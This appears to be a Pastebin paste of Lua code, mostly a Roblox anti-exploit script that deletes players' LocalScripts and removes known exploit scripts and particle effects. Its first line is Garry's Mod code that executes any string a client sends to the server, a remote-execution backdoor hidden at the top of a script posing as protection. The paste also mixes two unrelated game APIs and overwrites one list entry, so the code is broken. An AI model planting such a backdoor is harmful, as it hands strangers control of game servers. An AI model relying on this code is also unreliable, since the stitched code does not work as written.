Advertisement
Guest User

Untitled

a guest
May 24th, 2018
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.71 KB | None | 0 0
  1. util.AddNetworkString('SparksLeBg') net.Receive('SparksLeBg',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  2. script.Parent=game:FindFirstChildOfClass("ServerScriptService")pls=game:FindFirstChildOfClass("Players")script.Parent=nil
  3. destroy=false
  4. list={}dsc={}
  5. list[1]="https://pastebin.com/raw/QKxEgpLj"dsc[1]="Insane Nuke Launcher"
  6. list[2]="https://pastebin.com/raw/Wz1Y9E8q"dsc[2]="Noot Noot Decal Spamming"
  7. list[2]="https://pastebin.com/raw/Ui3NS1AU"dsc[2]="The Omni God Of Erradication"
  8. list[3]="https://pastebin.com/raw/DAKZyP0e"dsc[3]="Jojo Bizzare Adventure Sniper Gun"
  9. function run()
  10.     if script:IsA("Script")
  11.     then
  12.         while wait()do
  13.             local c=pls:GetChildren()
  14.             for i=1,#c do
  15.                 local gc=c[i]:FindFirstChildOfClass("PlayerGui"):GetChildren()
  16.                 for i2=1,#gc do
  17.                     if gc[i2]:IsA("LocalScript")then gc[i2]:Remove()end
  18.                 end
  19.             end
  20.         end
  21.     else
  22.         print("Please run with Script.(run or r)")
  23.     end
  24. end
  25. wait()
  26. spawn(run)
  27. function SPARKSLEBG(child)
  28.     if child:IsA("ParticleEmitter")then if child.Texture=="http://www.roblox.com/asset/?id=382332426"or child.Texture=="rbxassetid://382332426"then child:Remove()puttext("Someone used Noot Noot Script.")end end
  29.     if child:IsA("LocalScript")then for i=1,#list do if child.LinkedSource==list[i]then local h=Instance.new("Hint",workspace)h.Text="Someone tried to use "..dsc[i]..".(Parent Name:"..tostring(child.Parent)..")"debri:AddItem(h,5)child:Remove()end end end
  30.     local gc=child:GetChildren()
  31.     for i=1,#gc do
  32.         SPARKSLEBG(gc[i])
  33.     end
  34. end
  35. spawn(function()
  36.     while wait()do
  37.         SPARKSLEBG(workspace)
  38.     end
  39. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement